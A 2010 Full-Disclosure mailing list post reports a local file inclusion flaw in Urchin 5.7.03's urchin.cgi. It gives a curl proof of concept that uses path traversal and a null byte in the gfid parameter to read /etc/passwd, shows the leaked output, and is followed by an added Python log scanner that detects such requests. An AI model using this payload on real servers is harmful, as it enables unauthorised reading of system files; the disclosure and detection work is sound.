Date: Tue, 14 Dec 2010 03:34:30 -0800
From: Kristian Erik Hermansen <kristian.hermansen@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Google Urchin LFI (Local File Include) vulnerability

While fuzzing an Urchin web application, I discovered what appears to
be an LFI vulnerability.  Neither Secunia nor Google / Urchin appear
to have reported this as a known issue.  The problem lies in the gfid
parameter passed to urchin.cgi.  This was tested on a somewhat
modified version of Urchin 5.7.03, but it appears that the gfid param
can be influenced given the results.  I don't have the ability to test
further, but this appears valid and unpublished.  Can anyone confirm
they see similar behavior in the same version or other versions?

PoC:
"""
$ curl -s -b '...cookie_data...' \
'https://host/path/urchin.cgi?profile=...&rid=13&cmd=svg&gfid=/../../../../../../../../../../../etc/passwd%00.html&ie5=.svg'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
...
"""
-- 
Kristian Erik Hermansen
http://www.linkedin.com/in/kristianhermansen

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
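
A detection-side sketch, added here as an example and not part of the original post or of Urchin: it scans web access-log lines for urchin.cgi requests whose gfid value contains path traversal, a NUL byte, or an absolute path, the three traits of the request shown in the PoC. The log lines, the combined-log request format and all function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (assumed format, not from the post).
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Dec/2010:03:30:00 -0800] "GET /path/urchin.cgi?profile=p1&rid=13&cmd=svg&gfid=42&ie5=.svg HTTP/1.1" 200 5120',
    '10.0.0.9 - - [14/Dec/2010:03:31:10 -0800] "GET /path/urchin.cgi?profile=p1&rid=13&cmd=svg&gfid=/../../../etc/passwd%00.html&ie5=.svg HTTP/1.1" 200 1311',
    '10.0.0.9 - - [14/Dec/2010:03:31:40 -0800] "GET /path/urchin.cgi?rid=13&gfid=%252e%252e%252f%252e%252e%252fetc%252fhosts HTTP/1.1" 200 220',
    '10.0.0.7 - - [14/Dec/2010:03:32:00 -0800] "GET /index.html?gfid=../x HTTP/1.1" 200 90',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so multiply-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def gfid_findings(raw_gfid):
    """Return the reasons a raw gfid value looks like a file-path injection."""
    value = fully_decode(raw_gfid)
    reasons = []
    if "\x00" in value:                        # %00 truncation, as in the PoC
        reasons.append("nul-byte")
    if ".." in re.split(r"[\\/]", value):      # a ".." path segment
        reasons.append("traversal")
    if value.startswith(("/", "\\")):          # leading slash, as in the PoC
        reasons.append("absolute-path")
    return reasons

def scan(lines):
    """Return [(line_number, reasons)] for suspicious urchin.cgi requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.endswith("/urchin.cgi"):
            continue
        # Split the raw query by hand so encoded bytes reach gfid_findings intact.
        for pair in url.query.split("&"):
            key, _, raw = pair.partition("=")
            reasons = gfid_findings(raw) if key == "gfid" else []
            if reasons:
                hits.append((n, reasons))
    return hits
```

On the constructed sample, scan(SAMPLE_LOG) flags lines 2 and 3 and ignores the benign numeric gfid and the request to a different path.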
